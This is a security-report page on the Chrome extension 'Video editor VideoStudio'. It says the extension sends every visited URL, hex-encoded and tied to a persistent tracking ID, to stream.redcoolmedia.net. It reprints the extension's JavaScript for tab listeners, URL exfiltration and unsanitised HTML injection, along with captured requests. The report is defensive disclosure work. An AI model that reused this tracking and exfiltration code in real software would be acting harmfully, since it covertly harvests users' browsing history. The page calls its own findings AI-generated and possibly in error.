Is Video editor VideoStudio safe?

High risk

VideoStudio is high risk. Each time you switch tabs or navigate, Video editor VideoStudio sends the full URL to stream.redcoolmedia.net, hex-encoded but trivially reversible, giving the server your history in plain text. Testing confirmed this fires automatically.…

RedcoolMediav1.8.7Chrome Web Store
77Risk
Who publishes it

RedcoolMedia - 15 other listings from the same operator, 10 of them carrying a finding

What this publisher told the store about itself, and the other listings that told it the same thing.

Publisher
RedcoolMedia
Registered address
Europe Avenue, S/N, Pozuelo 28224, Spain

Same store account

15 other listings published from this account, 432k+ users between them. 10 of them carry a finding.

Shared hosts - 2 hostnames

Hostnames hardcoded in this extension that few other listings call. That can mean one operator behind both, and it can equally mean a small shared vendor, so it is context rather than a conclusion. Hosts that many listings call are left out: they are services, not connections.

stream.redcoolmedia.net
Also called by 4 other listings
redcoolmedia.net
Also called by 8 other listings

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

Every URL you visit is automatically transmitted to a remote server

Each time you switch tabs or navigate, Video editor VideoStudio sends the full URL to stream.redcoolmedia.net, hex-encoded but trivially reversible, giving the server your history in plain text.

Testing confirmed this fires automatically.

Severity
High unwanted
Type
Unexpected
CWE
CWE-359
Source
Dynamic sandbox
What actually happens
You did this

You navigate to any website or switch browser tabs.

This happens continuously throughout normal browsing, no special action required.

The extension did this

The extension immediately sends the full URL to stream.redcoolmedia.net.

The URL is hex-encoded and attached as the 'l' query parameter, paired with your persistent tracking ID in the 'u' parameter.

Captured request
GEThttps://stream.redcoolmedia.net/api/videostudiou.php?l=68747470733a2f2f7777772e676f6f676c652e636f6d2f&hex=1&u=hjywetnmng

HTTP 200 OK

Why you can't catch this in DevTools

The URL is encoded using bin2hex(), a simple ASCII-to-hex conversion where each character becomes two hex digits. This is not encryption; the server receives the full URL in instantly recoverable form.

Decoded value
https://www.google.com/
The code that does this

Navigation listeners and transmission logic in web.js

Readable version

Tab event listeners (web.js lines 20-27)

web.js
// Fires on EVERY tab switchchrome.tabs.onActivated.addListener(function(activeInfo) {    aati = activeInfo.tabId;    sendUrlToServer(aati);});// Fires on EVERY navigationchrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) {    sendUrlToServer(tabId);});

URL capture and transmission

web.js
function sendUrlToServer(tabId) {    chrome.tabs.get(tabId, function(tab) {        // Skips only redcoolmedia.net's own pages        if (!tab.url.includes('redco') && tab.url.includes('http') && tab.url !== lastSentUrl) {            transmit(tab.url);            lastSentUrl = tab.url;        }    });}// Sends hex-encoded URL + persistent user IDawait fetch('https://stream.redcoolmedia.net/api/videostudiou.php'    + '?l=' + bin2hex(url)   // hex-encoded URL    + '&hex=1'               // tells server encoding is in use    + '&u=' + userId);       // persistent tracking ID
Where your browsing history is sent
    • stream.redcoolmedia.net

    Receives every visited URL paired with a persistent per-installation tracking ID. Operated by redcoolmedia.net, the extension developer.

Opening the popup sends your tracking ID and returns your browsing history

Each time you open the popup, it queries a server endpoint with your persistent tracking ID and renders the response into the popup: a table of MP4 videos detected across visited pages, confirming a browsing-history database per install.

Severity
Medium unwanted
Type
Unexpected
CWE
CWE-200
Source
Dynamic sandbox
What actually happens
You did this

You open the extension popup.

No other interaction is required, the request fires immediately on popup load.

The extension did this

The server returns a personalised table of MP4 videos detected across your visited pages.

The response is injected as raw HTML into the popup, rendering your server-stored browsing history directly in your browser.

Captured request
GEThttps://stream.redcoolmedia.net/api/videostudiob.php?u=hjywetnmng

HTTP 200 OK, 128 bytes of personalised HTML: <tbody id="internetx"><tr><td style='color: #333;'>No mp4 videos in this webpage</td><td>-</td><td>-</td><td>-</td></tr></tbody>

The code that does this

Popup request and DOM injection in apar.js

Readable version

Server request and DOM injection

apar.js
// On every popup open, fetch this user's video history from the server// The 'u' parameter is the persistent per-installation tracking IDvar req = new XMLHttpRequest();req.open('GET', 'https://stream.redcoolmedia.net/api/videostudiob.php?u=' + trackingId, true);req.onload = function() {    if (req.readyState === 4 && req.status === 200) {        // Server returns HTML containing user's browsing history        // Injected directly into the popup DOM without sanitisation        document.getElementById('internetx').innerHTML = req.responseText;    }};req.send(); // Fires immediately when popup loads
Server maintaining per-user browsing history
    • stream.redcoolmedia.net

    Stores a per-user database of MP4-containing pages from URL exfil. Returns personalized browsing history as HTML on popup open. Operated by the extension developer.

A persistent tracking ID links all your browsing data to one profile

On first run, the extension generates a random 10-character ID stored permanently.

It's attached to every URL and popup request, linking your browsing into one profile across sessions.

Testing found the same ID in all 6 captured requests.

Severity
Medium unwanted
Type
Unexpected
CWE
CWE-359
Source
Dynamic sandbox
What actually happens
You did this

You install the extension for the first time.

The ID is generated immediately and permanently stored.

The extension did this

A permanent 10-character tracking ID is assigned to your browser installation.

This ID is sent with every URL upload and every popup request, linking all activity into one persistent profile on the developer's server.

What's stored on your device

'usernameredcool' is the persistent tracking ID sent with every request. 'redcoolonline' controls URL exfil; it defaults to '1' (enabled).

Location
chrome.storage.local key 'redcool_key'
Contents
{  "redcool_key": {    "redcoolonline": "1",    "usernameredcool": "hjywetnmng"  }}
The code that does this

Tracking ID generation and reuse in web.js

Readable version

Tracking ID retrieval and generation

web.js
// Load persistent tracking ID from local storagelet storageResult = await chrome.storage.local.get(['redcool_key']);let profile = storageResult['redcool_key'] || {};// Reuse existing ID, or generate a new one on first runif (profile.usernameredcool) {    trackingId = profile.usernameredcool;} else {    // 10-char random alphanumeric: 62^10 ≈ 839 trillion combinations    trackingId = randomString(10).toLowerCase();    profile.usernameredcool = trackingId;}// ID is then attached to EVERY request to the server
Tracking ID transmitted to
    • stream.redcoolmedia.net

    Receives the tracking ID as the 'u' parameter on every URL exfil request (/api/videostudiou.php) and every popup database query (/api/videostudiob.php).

+1 more finding not shown

What it can do

Permissions this extension asks for, as declared in version 1.8.7. Asking for a permission is not a finding on its own - it is what the extension can do if it chooses to.

  • Store data in your browser

    storage

  • See the address and title of every tab you have open

    tabs

Updated 30 September 2026lpaboeaccgehipchabmnialhaihbmhji